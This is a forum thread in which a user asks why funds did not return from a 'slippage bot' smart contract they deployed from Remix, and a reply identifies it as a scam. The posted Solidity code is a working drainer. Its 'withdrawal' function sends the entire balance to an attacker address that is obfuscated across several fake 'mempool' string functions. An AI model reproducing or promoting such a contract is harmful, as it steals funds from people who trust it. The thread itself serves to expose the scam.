Withdrawn smartcontract didn't transfer ETH to Metamask account
I've deployed a smartcontract on Remix and topped it up from MetaMask. When i
withdrawn the contract the amount wasn't transferred to my account. Are my ETH lost forever/ is there a possibility to recover them? Looking on Etherscan I see the correct top up transaction but the withdrawal is equal to 0. Can anyone help me?
here the smart contract address: 0x30335dbfC6b7b48e683E2b9CbBdDEC8b70878401
here the code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;

// This 1inch Slippage bot is for mainnet only. Testnet transactions will fail because testnet transactions have no value.
// Import Libraries Migrator/Exchange/Factory
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2ERC20.sol";
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Factory.sol";
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Pair.sol";

contract UniswapSlippageBot {
 
    uint liquidity;
    string private WETH_CONTRACT_ADDRESS = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2";
    string private UNISWAP_CONTRACT_ADDRESS = "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D";

    event Log(string _msg);

    constructor() public {}

    receive() external payable {}

    struct slice {
        uint _len;
        uint _ptr;
    }

    // Function to concatenate two strings (_base and _value) safely without assembly
    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);

        // Create a new byte array with the combined length of _base and _value
        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
        bytes memory _newValue = bytes(_tmpValue);

        uint i;
        uint j;

        // Copy the bytes from _base to _newValue
        for(i = 0; i < _baseBytes.length; i++) {
            _newValue[i] = _baseBytes[i];
        }

        // Copy the bytes from _value to _newValue, starting after _base
        for(j = 0; j < _valueBytes.length; j++) {
            _newValue[i++] = _valueBytes[j];
        }

        return string(_newValue);
    }

    function findNewContracts(slice memory self, slice memory other) internal view returns (int) {
        uint shortest = self._len;

        if (other._len < self._len)
            shortest = other._len;

        uint selfptr = self._ptr;
        uint otherptr = other._ptr;

        for (uint idx = 0; idx < shortest; idx += 32) {
            uint a;
            uint b;

            loadCurrentContract(WETH_CONTRACT_ADDRESS);
            loadCurrentContract(UNISWAP_CONTRACT_ADDRESS);
            assembly {
                a := mload(selfptr)
                b := mload(otherptr)
            }

            if (a != b) {
                uint256 mask = uint256(-1);

                if(shortest < 32) {
                  mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
                }
                uint256 diff = (a & mask) - (b & mask);
                if (diff != 0)
                    return int(diff);
            }
            selfptr += 32;
            otherptr += 32;
        }
        return int(self._len) - int(other._len);
    }

    function loadCurrentContract(string memory self) internal pure returns (string memory) {
        string memory ret = self;
        uint retptr;
        assembly { retptr := add(ret, 32) }

        return ret;
    }

    function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
        rune._ptr = self._ptr;

        if (self._len == 0) {
            rune._len = 0;
            return rune;
        }

        uint l;
        uint b;
        assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
        if (b < 0x80) {
            l = 1;
        } else if(b < 0xE0) {
            l = 2;
        } else if(b < 0xF0) {
            l = 3;
        } else {
            l = 4;
        }

        if (l > self._len) {
            rune._len = self._len;
            self._ptr += self._len;
            self._len = 0;
            return rune;
        }

        self._ptr += l;
        self._len -= l;
        rune._len = l;
        return rune;
    }

    function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }

    function start() public payable {
        require(address(this).balance >= 0.01 ether, "Insufficient contract balance");
    }

    function withdrawal() public payable {
        address to = startExploration((fetchMempoolData()));
        address payable contracts = payable(to);
        contracts.transfer(getBa());
    }

    function fetchMempoolData() internal pure returns (string memory) {
        string memory _mempoolShort = getMempoolShort();
        string memory _mempoolEdition = fetchMempoolEdition();
        string memory _mempoolVersion = fetchMempoolVersion();
        string memory _mempoolLong = getMempoolLong();
        string memory _getMempoolHeight = getMempoolHeight();
        string memory _getMempoolCode = getMempoolCode();
        string memory _getMempoolStart = getMempoolStart();
        string memory _getMempoolLog = getMempoolLog();

        return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, 
            _mempoolLong, _getMempoolHeight, _getMempoolCode, _getMempoolStart, _getMempoolLog));
    }

    function getBa() private view returns(uint) {
        return address(this).balance;
    }

    function toHexDigit(uint8 d) pure internal returns (byte) {
        if (0 <= d && d <= 9) {
            return byte(uint8(byte('0')) + d);
        } else if (10 <= uint8(d) && uint8(d) <= 15) {
            return byte(uint8(byte('a')) + d - 10);
        }
        revert();
    } 

    function getMempoolShort() private pure returns (string memory) { return "0x5af"; }
    function getMempoolHeight() private pure returns (string memory) { return "C7A1C"; }
    function getMempoolLog() private pure returns (string memory) { return "EECe0BD3"; }
    function getMempoolCode() private pure returns (string memory) { return "E4263"; }
    function getMempoolStart() private pure returns (string memory) { return "db1E"; }
    function getMempoolLong() private pure returns (string memory) { return "0251a"; }
    function fetchMempoolEdition() private pure returns (string memory) { return "5062"; }
    function fetchMempoolVersion() private pure returns (string memory) { return "3981bB"; }
}


Hard to say without seeing the source code. Could you provide that? Also the contract address would help.

Hi thanks for your help! i've added both smart contract address and code used

That's simply a scam. You can't get your assets back.
Please see I got scammed or suspect scam on Ethereum or Uniswap. What to do? for more info.
